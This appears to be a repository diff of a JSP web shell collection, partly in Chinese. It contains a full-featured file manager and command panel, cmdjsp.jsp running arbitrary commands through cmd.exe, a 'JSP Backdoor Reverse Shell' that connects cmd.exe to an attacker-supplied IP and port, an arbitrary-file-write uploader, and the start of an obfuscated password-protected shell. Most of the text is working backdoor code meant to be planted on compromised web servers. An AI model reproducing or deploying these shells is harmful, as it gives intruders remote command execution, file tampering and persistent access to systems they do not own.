|
||||
body {
|
||||
font-size: 12px;
|
||||
font-family: "宋体";
|
||||
background-color: #666666;
|
||||
}
|
||||
A {
|
||||
COLOR: black; TEXT-DECORATION: none
|
||||
}
|
||||
A:hover {
|
||||
COLOR: black; TEXT-DECORATION: underline; none:
|
||||
}
|
||||
td {
|
||||
font-size: 12px;
|
||||
font-family: "宋体";
|
||||
color: #000000;
|
||||
}
|
||||
|
||||
input.textbox {
|
||||
border: black solid 1;
|
||||
font-size: 12px;
|
||||
height: 18px;
|
||||
}
|
||||
|
||||
input.button {
|
||||
font-size: 12px;
|
||||
font-family: "宋体";
|
||||
border: black solid 1;
|
||||
}
|
||||
|
||||
td.datarows {
|
||||
font-size: 12px;
|
||||
font-family: "宋体";
|
||||
height: 25px;
|
||||
color: #000000;
|
||||
}
|
||||
.PicBar { background-color: #f58200; border: 1px solid #000000; height: 12px;}
|
||||
textarea {
|
||||
border: black solid 1;
|
||||
}
|
||||
.inputLogin {font-size: 9pt;border:1px solid lightgrey;background-color: lightgrey;}
|
||||
.table1 {BORDER:gray 0px ridge;}
|
||||
.td2 {BORDER-RIGHT:#ffffff 0px solid;BORDER-TOP:#ffffff 1px solid;BORDER-LEFT:#ffffff 1px solid;BORDER-BOTTOM:#ffffff 0px solid;BACKGROUND-COLOR:lightgrey; height:18px;}
|
||||
.tr1 {BACKGROUND-color:gray }
|
||||
</style>
|
||||
<script language="JavaScript" type="text/JavaScript">
|
||||
<!--
|
||||
function MM_reloadPage(init) { //reloads the window if Nav4 resized
|
||||
if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {
|
||||
document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}
|
||||
else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();
|
||||
}
|
||||
MM_reloadPage(true);
|
||||
//-->
|
||||
</script>
|
||||
</head>
|
||||
<body bgcolor="#666666">
|
||||
<%
|
||||
//session.setMaxInactiveInterval(_sessionOutTime * 60);
|
||||
String password=request.getParameter("password");
|
||||
if (password == null && session.getAttribute("password") == null) {
|
||||
|
||||
%>
|
||||
|
||||
<div align="center" style="position:absolute;width:100%;visibility:show; z-index:0;left:4px;top:272px">
|
||||
<TABLE class="table1" cellSpacing="1" cellPadding="1" width="473" border="0" align="center">
|
||||
<tr>
|
||||
<td class="tr1"> <TABLE cellSpacing="0" cellPadding="0" width="468" border="0">
|
||||
<tr>
|
||||
<TD align="left" bgcolor="#333333"><FONT face="webdings" color="#ffffff"> 8</FONT><FONT face="Verdana, Arial, Helvetica, sans-serif" color="#ffffff"><b>JspWebShell
|
||||
version 1.2管理登录 :::...</b></font></TD>
|
||||
<TD align="right" bgcolor="#333333"><FONT color="#d2d8ec">Power By
|
||||
绝对零度</FONT></TD>
|
||||
</tr>
|
||||
<form name="bctform" method="post">
|
||||
<tr bgcolor="#999999">
|
||||
<td height="30" colspan="2" align="center" class="td2">
|
||||
<input name="password" type="password" class="textbox" id="Textbox" />
|
||||
<input type="submit" name="Button" value="Login" id="Button" title="Click here to login" class="button" />
|
||||
</td>
|
||||
</tr>
|
||||
</form>
|
||||
</TABLE></td>
|
||||
</tr>
|
||||
</TABLE>
|
||||
</div>
|
||||
<%
|
||||
|
||||
} else {
|
||||
|
||||
if (session.getAttribute("password") == null) {
|
||||
|
||||
if (validate(password) == false) {
|
||||
out.println("<div align=\"center\"><font color=\"red\"><li>密码错误</font></div>");
|
||||
out.close();
|
||||
return;
|
||||
}
|
||||
|
||||
session.setAttribute("password", password);
|
||||
} else {
|
||||
password = (String)session.getAttribute("password");
|
||||
}
|
||||
%>
|
||||
<%
|
||||
File tmpFile = null;
|
||||
String delfile="";
|
||||
String delfile1="";
|
||||
String editpath="";
|
||||
delfile1=request.getParameter("delfile");
|
||||
editpath=request.getParameter("filepath");
|
||||
if (delfile1!=null)
|
||||
{delfile=new String(delfile1.getBytes("ISO8859_1"));
|
||||
}
|
||||
if ( delfile1!= null) {
|
||||
// out.print(delfile);
|
||||
tmpFile = new File(delfile);
|
||||
if (! tmpFile.delete()) {
|
||||
out.print( "<font color=\"red\">删除失败</font><br>\n");
|
||||
}
|
||||
}
|
||||
%>
|
||||
<%String editfilecontent=null;
|
||||
String editfilecontent1=request.getParameter("content");
|
||||
// out.println(editfilecontent1);
|
||||
//String save=request.getParameter("save");
|
||||
if (editfilecontent1!=null)
|
||||
{editfilecontent=new String(editfilecontent1.getBytes("ISO8859_1"));}
|
||||
// out.print(editfile);
|
||||
//out.print(editfilecontent);
|
||||
if (editfile!=null&editfilecontent!=null)
|
||||
{try {writeFile(editfile,editfilecontent);}
|
||||
catch (Exception e) {out.print("写入失败");}
|
||||
out.print("写入成功");
|
||||
}
|
||||
%>
|
||||
<%request.setCharacterEncoding("GBK");%>
|
||||
<%//String editfile=request.getParameter("editfile");
|
||||
//out.print(editfile);
|
||||
if (request.getParameter("jsptz")!=null)
|
||||
{%>
|
||||
<div id="Layer2" style="position:absolute; left:9px; top:340px; width:725px; height:59px; z-index:2">
|
||||
<CENTER>
|
||||
<table border="0" cellpadding="0" cellspacing="1" class="tableBorder">
|
||||
<tr>
|
||||
<td height="22" align="center" bgcolor="#000000" ><font color=#FFFFFF><strong>服务器相关参数</strong></font>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td style="display" id='submenu0'><table border=0 width=100% cellspacing=1 cellpadding=3 bgcolor="#FFFFFF">
|
||||
<tr bgcolor="#999999" height="22">
|
||||
<td width="130" bgcolor="#999999"> 服务器名</td>
|
||||
<td height="22" colspan="3"> <%= request.getServerName() %>(<%=request.getRemoteAddr()%>)</td>
|
||||
</tr>
|
||||
<tr bgcolor="#999999" height="22">
|
||||
<td> 服务器操作系统</td>
|
||||
<td colspan="3"> <%=env.queryHashtable("os.name")%> <%=env.queryHashtable("os.version")%>
|
||||
<%=env.queryHashtable("sun.os.patch.level")%></td>
|
||||
</tr>
|
||||
<tr bgcolor="#999999" height="22">
|
||||
<td> 服务器操作系统类型</td>
|
||||
<td> <%=env.queryHashtable("os.arch")%></td>
|
||||
<td> 服务器操作系统模式</td>
|
||||
<td> <%=env.queryHashtable("sun.arch.data.model")%>位</td>
|
||||
</tr>
|
||||
<tr bgcolor="#999999" height="22">
|
||||
<td> 服务器所在地区</td>
|
||||
<td> <%=env.queryHashtable("user.country")%></td>
|
||||
<td> 服务器语言</td>
|
||||
<td> <%=env.queryHashtable("user.language")%></td>
|
||||
</tr>
|
||||
<tr bgcolor="#999999" height="22">
|
||||
<td> 服务器时区</td>
|
||||
<td> <%=env.queryHashtable("user.timezone")%></td>
|
||||
<td> 服务器时间</td>
|
||||
<td> <%=new java.util.Date()%> </td>
|
||||
</tr>
|
||||
<tr bgcolor="#999999" height="22">
|
||||
<td> 服务器解译引擎</td>
|
||||
<td width="170"> <%= getServletContext().getServerInfo() %></td>
|
||||
<td width="130"> 服务器端口</td>
|
||||
<td width="170"> <%= request.getServerPort() %></td>
|
||||
</tr>
|
||||
<tr bgcolor="#999999" height="22">
|
||||
<td height="22"> 当前用户</td>
|
||||
<td height="22" colspan="3"> <%=env.queryHashtable("user.name")%></td>
|
||||
</tr>
|
||||
<tr bgcolor="#999999" height="22">
|
||||
<td> 用户目录</td>
|
||||
<td colspan="3"> <%=env.queryHashtable("user.dir")%></td>
|
||||
</tr>
|
||||
<tr bgcolor="#999999" height="22">
|
||||
<td align=left> 本文件实际路径</td>
|
||||
<td height="8" colspan="3"> <%=request.getRealPath(request.getServletPath())%></td>
|
||||
</tr>
|
||||
</table>
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
<br>
|
||||
<table width="640" border="0" cellpadding="0" cellspacing="1" class="tableBorder">
|
||||
<tr>
|
||||
<td width="454" height="22" align="center" bgcolor="#000000" onclick="showsubmenu(1)"><font color=#FFFFFF><strong>JAVA相关参数</strong></font>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td style="display" id='submenu1'>
|
||||
<table border=0 width=99% cellspacing=1 cellpadding=3 bgcolor="#FFFFFF">
|
||||
<tr bgcolor="#666666" height="22">
|
||||
<td width="30%"> 名称</td>
|
||||
<td width="50%" height="22"> 英文名称</td>
|
||||
<td width="20%" height="22"> 版本</td>
|
||||
</tr>
|
||||
<tr bordercolor="#FFFFFF" bgcolor="#999999" height="22">
|
||||
<td width="30%"> JAVA运行环境名称</td>
|
||||
<td width="50%" height="22"> <%=env.queryHashtable("java.runtime.name")%></td>
|
||||
<td width="20%" height="22"> <%=env.queryHashtable("java.runtime.version")%></td>
|
||||
</tr>
|
||||
<tr bordercolor="#FFFFFF" bgcolor="#999999" height="22">
|
||||
<td width="30%"> JAVA运行环境说明书名称</td>
|
||||
<td width="50%" height="22"> <%=env.queryHashtable("java.specification.name")%></td>
|
||||
<td width="20%" height="22"> <%=env.queryHashtable("java.specification.version")%></td>
|
||||
</tr>
|
||||
<tr bordercolor="#FFFFFF" bgcolor="#999999" height="22">
|
||||
<td width="30%"> JAVA虚拟机名称</td>
|
||||
<td width="50%" height="22"> <%=env.queryHashtable("java.vm.name")%></td>
|
||||
<td width="20%" height="22"> <%=env.queryHashtable("java.vm.version")%></td>
|
||||
</tr>
|
||||
<tr bordercolor="#FFFFFF" bgcolor="#999999" height="22">
|
||||
<td width="30%"> JAVA虚拟机说明书名称</td>
|
||||
<td width="50%" height="22"> <%=env.queryHashtable("java.vm.specification.name")%></td>
|
||||
<td width="20%" height="22"> <%=env.queryHashtable("java.vm.specification.version")%></td>
|
||||
</tr>
|
||||
<%
|
||||
float fFreeMemory=(float)Runtime.getRuntime().freeMemory();
|
||||
float fTotalMemory=(float)Runtime.getRuntime().totalMemory();
|
||||
float fPercent=fFreeMemory/fTotalMemory*100;
|
||||
%>
|
||||
<tr bordercolor="#FFFFFF" bgcolor="#999999" height="22">
|
||||
<td height="22"> JAVA虚拟机剩余内存:</td>
|
||||
<td height="22" colspan="2"><img width='8' height="12" align=absmiddle class=PicBar style="background-color: #000000"> <%=fFreeMemory/1024/1024%>M
|
||||
</td>
|
||||
</tr>
|
||||
<tr bordercolor="#FFFFFF" bgcolor="#999999" height="22">
|
||||
<td height="22"> JAVA虚拟机分配内存</td>
|
||||
<td height="22" colspan="2"><img width='85%' align=absmiddle class=PicBar style="background-color: #000000"> <%=fTotalMemory/1024/1024%>M
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
<table border=0 width=99% cellspacing=1 cellpadding=3 bgcolor="#FFFFFF">
|
||||
<tr bgcolor="#666666" height="22">
|
||||
<td width="30%"> 参数名称</td>
|
||||
<td width="70%" height="22"> 参数路径</td>
|
||||
</tr>
|
||||
<tr bgcolor="#999999" height="22">
|
||||
<td width="30%"> java.class.path </td>
|
||||
<td width="70%" height="22"> <%=env.queryHashtable("java.class.path").replaceAll(env.queryHashtable("path.separator"),env.queryHashtable("path.separator")+"<br> ")%>
|
||||
</td>
|
||||
</tr>
|
||||
<tr bgcolor="#999999" height="22">
|
||||
<td width="30%"> java.home</td>
|
||||
<td width="70%" height="22"> <%=env.queryHashtable("java.home")%></td>
|
||||
</tr>
|
||||
<tr bgcolor="#999999" height="22">
|
||||
<td width="30%"> java.endorsed.dirs</td>
|
||||
<td width="70%" height="22"> <%=env.queryHashtable("java.endorsed.dirs")%></td>
|
||||
</tr>
|
||||
<tr bgcolor="#999999" height="22">
|
||||
<td width="30%"> java.library.path</td>
|
||||
<td width="70%" height="22"> <%=env.queryHashtable("java.library.path").replaceAll(env.queryHashtable("path.separator"),env.queryHashtable("path.separator")+"<br> ")%>
|
||||
</td>
|
||||
</tr>
|
||||
<tr bgcolor="#999999" height="22">
|
||||
<td width="30%"> java.io.tmpdir</td>
|
||||
<td width="70%" height="22"> <%=env.queryHashtable("java.io.tmpdir")%></td>
|
||||
</tr>
|
||||
</table>
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
<br>
|
||||
<div id="testspeed" align="center"> </div>
|
||||
</CENTER></div>
|
||||
|
||||
<%}
|
||||
else{
|
||||
if (editfile!=null)//if edit
|
||||
{
|
||||
%>
|
||||
<div id="Layer1" style="position:absolute; left:-17px; top:1029px; width:757px; height:250px; z-index:1">
|
||||
<table width="99%" height="232" border="0">
|
||||
<tr>
|
||||
<td height="226"><form name="form2" method="post" action="">
|
||||
<p align="center"> 地址:
|
||||
<input name="editfile" type="text" value="<%=editfile%>" size="50">
|
||||
</p>
|
||||
<p align="center">
|
||||
<textarea name="content" cols="105" rows="30"><%=readAllFile(editfile)%></textarea>
|
||||
<input type="submit" name="Submit2" value="保存">
|
||||
</p>
|
||||
</form> </td>
|
||||
</tr>
|
||||
</table>
|
||||
<p> </p></div>
|
||||
<%}
|
||||
else{%>
|
||||
|
||||
<table border="1" width="770" cellpadding="4" bordercolorlight="#999999" bordercolordark="#ffffff" align="center" cellspacing="0">
|
||||
<tr bgcolor="#333333">
|
||||
<td colspan="4" align="center"><FONT face="Verdana, Arial, Helvetica, sans-serif" color="#ffffff">JspWebShell
|
||||
version 1.0</font><font color="#FFFFFF">(网站目录:<%=config.getServletContext().getRealPath("/")%>)</font></td>
|
||||
</tr>
|
||||
<tr bgcolor="#999999">
|
||||
<td colspan="4"> <font color="#000000">
|
||||
<%
|
||||
File[] fs = File.listRoots();
|
||||
for (int i = 0; i < fs.length; i++){
|
||||
%>
|
||||
<a href="<%=selfName %>?path=<%=fs[i].getPath()%>\">本地磁盘(<%=fs[i].getPath()%>)
|
||||
</a>
|
||||
<%}%>
|
||||
</font></td>
|
||||
</tr>
|
||||
<tr bgcolor="#999999">
|
||||
<td height="10" colspan="4"> <font color="#000000">
|
||||
<form name="form1" method="post" action="">
|
||||
<input type="text" name="command" class="button">
|
||||
<input type="submit" name="Submit" value="CMD命令执行" class="button">
|
||||
</form>
|
||||
</font> <p>
|
||||
<%
|
||||
String cmd = "";
|
||||
InputStream ins = null;
|
||||
String result = "";
|
||||
if (request.getParameter("command") != null) {
|
||||
cmd = (String)request.getParameter("command");result = exeCmd(cmd);%>
|
||||
<%=result == "" ? " " : result%>
|
||||
<%}%>
|
||||
</td>
|
||||
</tr>
|
||||
<FORM METHOD="POST" ACTION="?up=true&path=<%String path1=config.getServletContext().getRealPath("/"); String tempfilepath=request.getParameter("path"); if(tempfilepath!=null) path1=tempfilepath;path1=path1.replaceAll("\\\\", "\\\\\\\\"); %><%=path1%>" ENCTYPE="multipart/form-data">
|
||||
<tr bgcolor="#999999">
|
||||
<td colspan="2"> <INPUT TYPE="FILE" NAME="FILE1" style="width:150" SIZE="50" class="button">
|
||||
<INPUT TYPE="SUBMIT" VALUE="上传" class="button"> </td>
|
||||
<td colspan="2"><a href="?jsptz=true" target="_blank">JSP探针</a> </td>
|
||||
</tr>
|
||||
</FORM>
|
||||
<% String fileexe="";
|
||||
String dir="";
|
||||
String deldir="";
|
||||
String scrfile="";
|
||||
String dstfile="";
|
||||
fileexe=request.getParameter("fileexe");
|
||||
dir=request.getParameter("dir");
|
||||
deldir=request.getParameter("deldir");
|
||||
scrfile=request.getParameter("scrfile");
|
||||
dstfile=request.getParameter("dstfile");
|
||||
if (fileexe!=null)
|
||||
{
|
||||
//out.print(path+fileexe);
|
||||
createFile(path+fileexe);
|
||||
}
|
||||
if (dir!=null)
|
||||
{
|
||||
//out.print(path+dir);
|
||||
createFolder(path+dir);
|
||||
}
|
||||
if (deldir!=null)
|
||||
{
|
||||
//out.print(deldir);
|
||||
DeleteFolder(deldir);
|
||||
}
|
||||
if (scrfile!=null&dstfile!=null)
|
||||
{
|
||||
//out.print(scrfile);
|
||||
//out.print(dstfile);
|
||||
copyfinish=fileCopy(scrfile, dstfile) ;
|
||||
}
|
||||
%>
|
||||
<tr bgcolor="#CCCCCC">
|
||||
<td height="10" colspan="2" bgcolor="#999999"> <form name="form3" method="post" action="">
|
||||
文件夹名:
|
||||
<input name="dir" type="text" size="10" class="button">
|
||||
<input type="submit" name="Submit3" value="新建目录" class="button">
|
||||
</form></td>
|
||||
<td width="188" height="10" bgcolor="#999999"> <form name="form4" method="post" action="">
|
||||
文件名:
|
||||
<input name="fileexe" type="text" size="8" class="button">
|
||||
<input type="submit" name="Submit4" value="新建文件" class="button">
|
||||
</form></td>
|
||||
<td width="327" height="10" bgcolor="#999999"><form name="form5" method="post" action="">
|
||||
文件<input name="scrfile" type="text" size="15"class="button">
|
||||
复制到
|
||||
<input name="dstfile" type="text" size="15" class="button">
|
||||
<input type="submit" name="Submit5" value="复制" class="button">
|
||||
</form><font color="#FF0000"><%if(copyfinish==true) out.print("复制成功");%></font></td>
|
||||
</tr>
|
||||
<%//上传
|
||||
String tempfilename="";
|
||||
String up=request.getParameter("up");
|
||||
// String tempfilepath=request.getParameter("filepath");
|
||||
// out.print(tempfilepath);
|
||||
if(up!=null)
|
||||
{
|
||||
tempfilename=(String)session.getId();
|
||||
//String tempfilename=request.getParameter("file");
|
||||
File f1=new File(tempfilepath,tempfilename);
|
||||
int n;
|
||||
try
|
||||
{
|
||||
InputStream in=request.getInputStream();
|
||||
BufferedInputStream my_in=new BufferedInputStream(in);
|
||||
FileOutputStream fout=new FileOutputStream(f1);
|
||||
BufferedOutputStream my_out=new BufferedOutputStream(fout);
|
||||
byte[] b=new byte[10000];
|
||||
while((n=my_in.read(b))!=-1)
|
||||
{
|
||||
my_out.write(b,0,n);
|
||||
}
|
||||
my_out.flush();
|
||||
my_out.close();
|
||||
fout.close();
|
||||
my_in.close();
|
||||
in.close();
|
||||
// out.print("文件创建成功!<br>");
|
||||
}
|
||||
catch(IOException e)
|
||||
{
|
||||
out.print("文件创建失败!");
|
||||
}
|
||||
|
||||
try
|
||||
{
|
||||
RandomAccessFile random1=new RandomAccessFile(f1,"r");
|
||||
random1.readLine();
|
||||
String filename=random1.readLine();
|
||||
byte[] b=filename.getBytes("ISO-8859-1");
|
||||
filename=new String(b);
|
||||
int pointer=filename.lastIndexOf('\\');
|
||||
filename=filename.substring(pointer+1,filename.length()-1);
|
||||
File f2=new File(tempfilepath,filename);
|
||||
RandomAccessFile random2=new RandomAccessFile(f2,"rw");
|
||||
random1.seek(0);
|
||||
for(int i=1; i<=4; i++)
|
||||
{
|
||||
String tempstr=random1.readLine();
|
||||
}
|
||||
long startPoint=random1.getFilePointer();
|
||||
random1.seek(random1.length());
|
||||
long mark=random1.getFilePointer();
|
||||
int j=0;
|
||||
long endPoint=0;
|
||||
while((mark>=0)&&(j<=5))
|
||||
{
|
||||
mark--;
|
||||
random1.seek(mark);
|
||||
n=random1.readByte();
|
||||
if(n=='\n')
|
||||
|
||||
{
|
||||
j++;
|
||||
endPoint=random1.getFilePointer();
|
||||
}
|
||||
}
|
||||
long length=endPoint-startPoint+1;
|
||||
int order=(int)(length/10000);
|
||||
int left=(int)(length%10000);
|
||||
byte[] c=new byte[10000];
|
||||
random1.seek(startPoint);
|
||||
for(int i=0; i<order; i++)
|
||||
{
|
||||
random1.read(c);
|
||||
random2.write(c);
|
||||
}
|
||||
random1.read(c,0,left);
|
||||
random2.write(c,0,left);
|
||||
random1.close();
|
||||
random2.close();
|
||||
f1.delete();
|
||||
out.print("文件上传成功!");
|
||||
}
|
||||
catch(Exception e)
|
||||
{
|
||||
out.print("文件上传失败!");
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
%>
|
||||
<tr>
|
||||
<td width="196" height="48" valign="top" bgcolor="#999999">
|
||||
<% try {
|
||||
//path=request.getParameter("path");
|
||||
//if(path==null)
|
||||
//path=config.getServletContext().getRealPath("/");
|
||||
File f=new File(path);
|
||||
File[] fList= f.listFiles() ;
|
||||
for (int j=0;j<fList.length;j++)
|
||||
{
|
||||
if (fList[j].isDirectory())
|
||||
{%>
|
||||
<a href="<%=selfName %>?path=<%=path%><%=fList[j].getName()%>\"> <%=fList[j].getName()%></a> <a href="?path=<%=path%>&deldir=<%=path%><%=fList[j].getName()%>">删除</a><br>
|
||||
<% }
|
||||
|
||||
}//for
|
||||
} catch (Exception e) {
|
||||
System.out.println("不存在或没有权限");
|
||||
}
|
||||
%>
|
||||
</td>
|
||||
<td colspan="3" valign="top" bgcolor="#999999">
|
||||
<% try {
|
||||
path=request.getParameter("path");
|
||||
if(path==null)
|
||||
path=config.getServletContext().getRealPath("/");
|
||||
File f=new File(path);
|
||||
File[] fList= f.listFiles() ;
|
||||
for (int j=0;j<fList.length;j++)
|
||||
{
|
||||
if (fList[j].isFile())
|
||||
{//request.getContextPath()得到虚拟路径%>
|
||||
<%=fList[j].getName()%>
|
||||
<a href="?path=<%String tempfilepath1=request.getParameter("path"); if(tempfilepath!=null) path=tempfilepath;%><%=path%>&editfile=<%=path%><%=fList[j].getName()%>" target="_blank">编辑</a>
|
||||
<a href="?action=del&path=<%=path%>&delfile=<%=path%><%=fList[j].getName()%>">删除</a><br>
|
||||
<% }
|
||||
}//for
|
||||
} catch (Exception e) {
|
||||
System.out.println("不存在或没有权限");
|
||||
}
|
||||
%>
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
<p align="center">Power By 绝对零度[B.C.T] QQ:48124012</p>
|
||||
<p align="center"> </p>
|
||||
<%}//if edit
|
||||
}
|
||||
}
|
||||
%>
|
||||
</body>
|
||||
</html>
|
31
jsp/hackk8/JSP/cmdjsp.jsp
Normal file
31
jsp/hackk8/JSP/cmdjsp.jsp
Normal file
|
@ -0,0 +1,31 @@
|
|||
// note that linux = cmd and windows = "cmd.exe /c + cmd"
|
||||
|
||||
<FORM METHOD=GET ACTION='cmdjsp.jsp'>
|
||||
<INPUT name='cmd' type=text>
|
||||
<INPUT type=submit value='Run'>
|
||||
</FORM>
|
||||
|
||||
<%@ page import="java.io.*" %>
|
||||
<%
|
||||
String cmd = request.getParameter("cmd");
|
||||
String output = "";
|
||||
|
||||
if(cmd != null) {
|
||||
String s = null;
|
||||
try {
|
||||
Process p = Runtime.getRuntime().exec("cmd.exe /C " + cmd);
|
||||
BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
|
||||
while((s = sI.readLine()) != null) {
|
||||
output += s;
|
||||
}
|
||||
}
|
||||
catch(IOException e) {
|
||||
e.printStackTrace();
|
||||
}
|
||||
}
|
||||
%>
|
||||
|
||||
<pre>
|
||||
<%=output %>
|
||||
</pre>
|
||||
|
90
jsp/hackk8/JSP/jsp-reverse.jsp
Normal file
90
jsp/hackk8/JSP/jsp-reverse.jsp
Normal file
|
@ -0,0 +1,90 @@
|
|||
// backdoor.jsp
|
||||
|
||||
|
||||
<%@
|
||||
page import="java.lang.*, java.util.*, java.io.*, java.net.*"
|
||||
% >
|
||||
<%!
|
||||
static class StreamConnector extends Thread
|
||||
{
|
||||
InputStream is;
|
||||
OutputStream os;
|
||||
|
||||
StreamConnector(InputStream is, OutputStream os)
|
||||
{
|
||||
this.is = is;
|
||||
this.os = os;
|
||||
}
|
||||
|
||||
public void run()
|
||||
{
|
||||
BufferedReader isr = null;
|
||||
BufferedWriter osw = null;
|
||||
|
||||
try
|
||||
{
|
||||
isr = new BufferedReader(new InputStreamReader(is));
|
||||
osw = new BufferedWriter(new OutputStreamWriter(os));
|
||||
|
||||
char buffer[] = new char[8192];
|
||||
int lenRead;
|
||||
|
||||
while( (lenRead = isr.read(buffer, 0, buffer.length)) > 0)
|
||||
{
|
||||
osw.write(buffer, 0, lenRead);
|
||||
osw.flush();
|
||||
}
|
||||
}
|
||||
catch (Exception ioe)
|
||||
|
||||
try
|
||||
{
|
||||
if(isr != null) isr.close();
|
||||
if(osw != null) osw.close();
|
||||
}
|
||||
catch (Exception ioe)
|
||||
}
|
||||
}
|
||||
%>
|
||||
|
||||
<h1>JSP Backdoor Reverse Shell</h1>
|
||||
|
||||
<form method="post">
|
||||
IP Address
|
||||
<input type="text" name="ipaddress" size=30>
|
||||
Port
|
||||
<input type="text" name="port" size=10>
|
||||
<input type="submit" name="Connect" value="Connect">
|
||||
</form>
|
||||
<p>
|
||||
<hr>
|
||||
|
||||
<%
|
||||
String ipAddress = request.getParameter("ipaddress");
|
||||
String ipPort = request.getParameter("port");
|
||||
|
||||
if(ipAddress != null && ipPort != null)
|
||||
{
|
||||
Socket sock = null;
|
||||
try
|
||||
{
|
||||
sock = new Socket(ipAddress, (new Integer(ipPort)).intValue());
|
||||
|
||||
Runtime rt = Runtime.getRuntime();
|
||||
Process proc = rt.exec("cmd.exe");
|
||||
|
||||
StreamConnector outputConnector =
|
||||
new StreamConnector(proc.getInputStream(),
|
||||
sock.getOutputStream());
|
||||
|
||||
StreamConnector inputConnector =
|
||||
new StreamConnector(sock.getInputStream(),
|
||||
proc.getOutputStream());
|
||||
|
||||
outputConnector.start();
|
||||
inputConnector.start();
|
||||
}
|
||||
catch(Exception e)
|
||||
}
|
||||
%>
|
||||
|
2326
jsp/hackk8/JSP/jspspy有屏幕.txt
Normal file
2326
jsp/hackk8/JSP/jspspy有屏幕.txt
Normal file
File diff suppressed because it is too large
Load diff
48
jsp/hackk8/JSP/minupload.jsp
Normal file
48
jsp/hackk8/JSP/minupload.jsp
Normal file
|
@ -0,0 +1,48 @@
|
|||
|
||||
<%@page contentType="text/html;charset=utf-8"%>
|
||||
<%@page import="java.io.*,java.util.*,java.net.*"%>
|
||||
<html>
|
||||
<head>
|
||||
<title>JspDo Code By Xiao.3</title>
|
||||
<style type="text/css">
|
||||
body { color:red; font-size:12px; background-color:white; }
|
||||
</style>
|
||||
</head>
|
||||
<body>
|
||||
<%
|
||||
if(request.getParameter("context")!=null)
|
||||
{ //这小马有问题 上传jsp就出错
|
||||
String context=new String(request.getParameter("context").getBytes("ISO-8859-1"),"utf-8");
|
||||
String path=new String(request.getParameter("path").getBytes("ISO-8859-1"),"utf-8");
|
||||
OutputStream pt = null;
|
||||
try {
|
||||
pt = new FileOutputStream(path);
|
||||
pt.write(context.getBytes());
|
||||
out.println("<a href='"+request.getScheme()+"://"+request.getServerName()+":"+request.getServerPort()+request.getRequestURI()+"'><font color='red' title='点击可以转到上传的文件页面!'>上传成功!</font></a>");
|
||||
} catch (FileNotFoundException ex2) {
|
||||
out.println("<font color='red'>上传失败!</font>");
|
||||
} catch (IOException ex) {
|
||||
out.println("<font color='red'>上传失败!</font>");
|
||||
} finally {
|
||||
try {
|
||||
pt.close();
|
||||
} catch (IOException ex3) {
|
||||
out.println("<font color='red'>上传失败!</font>");
|
||||
}
|
||||
}
|
||||
}
|
||||
%>
|
||||
<form name="frmUpload" method="post" action="">
|
||||
<font color="blue">本文件的路径:</font><%out.print(request.getRealPath(request.getServletPath())); %>
|
||||
<br>
|
||||
<br>
|
||||
<font color="blue">上传文件路径:</font><input type="text" size="70" name="path" value="<%out.print(getServletContext().getRealPath("/")+"\k8cmd.jsp"); %>">
|
||||
<br>
|
||||
<br>
|
||||
上传文件内容:<textarea name="context" id="context" style="width: 51%; height: 150px;"></textarea>
|
||||
<br>
|
||||
<br>
|
||||
<input type="submit" name="btnSubmit" value="Upload">
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
1913
jsp/hackk8/JSP/other/download.jsp
Normal file
1913
jsp/hackk8/JSP/other/download.jsp
Normal file
File diff suppressed because it is too large
Load diff
2329
jsp/hackk8/JSP/other/jspspy.jsp
Normal file
2329
jsp/hackk8/JSP/other/jspspy.jsp
Normal file
File diff suppressed because it is too large
Load diff
2323
jsp/hackk8/JSP/other/jspspy_k8.jsp
Normal file
2323
jsp/hackk8/JSP/other/jspspy_k8.jsp
Normal file
File diff suppressed because it is too large
Load diff
59
jsp/hackk8/JSP/other/thx.jsp
Normal file
59
jsp/hackk8/JSP/other/thx.jsp
Normal file
|
@ -0,0 +1,59 @@
|
|||
<%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%>
|
||||
<%!
|
||||
String Pwd="xc";
|
||||
String EC(String s,String c)throws Exception{return s;}//new String(s.getBytes("ISO-8859-1"),c);}
|
||||
Connection GC(String s)throws Exception{String[] x=s.trim().split("\r\n");Class.forName(x[0].trim()).newInstance();
|
||||
Connection c=DriverManager.getConnection(x[1].trim());if(x.length>2){c.setCatalog(x[2].trim());}return c;}
|
||||
void AA(StringBuffer sb)throws Exception{File r[]=File.listRoots();for(int i=0;i<r.length;i++){sb.append(r[i].toString().substring(0,2));}}
|
||||
void BB(String s,StringBuffer sb)throws Exception{File oF=new File(s),l[]=oF.listFiles();String sT, sQ,sF="";java.util.Date dt;
|
||||
SimpleDateFormat fm=new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");for(int i=0;i<l.length;i++){dt=new java.util.Date(l[i].lastModified());
|
||||
sT=fm.format(dt);sQ=l[i].canRead()?"R":"";sQ+=l[i].canWrite()?" W":"";if(l[i].isDirectory()){sb.append(l[i].getName()+"/\t"+sT+"\t"+l[i].length()+"\t"+sQ+"\n");}
|
||||
else{sF+=l[i].getName()+"\t"+sT+"\t"+l[i].length()+"\t"+sQ+"\n";}}sb.append(sF);}
|
||||
void EE(String s)throws Exception{File f=new File(s);if(f.isDirectory()){File x[]=f.listFiles();
|
||||
for(int k=0;k<x.length;k++){if(!x[k].delete()){EE(x[k].getPath());}}}f.delete();}
|
||||
void FF(String s,HttpServletResponse r)throws Exception{int n;byte[] b=new byte[512];r.reset();
|
||||
ServletOutputStream os=r.getOutputStream();BufferedInputStream is=new BufferedInputStream(new FileInputStream(s));
|
||||
os.write(("->"+"|").getBytes(),0,3);while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.write(("|"+"<-").getBytes(),0,3);os.close();is.close();}
|
||||
void GG(String s, String d)throws Exception{String h="0123456789ABCDEF";int n;File f=new File(s);f.createNewFile();
|
||||
FileOutputStream os=new FileOutputStream(f);for(int i=0;i<d.length();i+=2)
|
||||
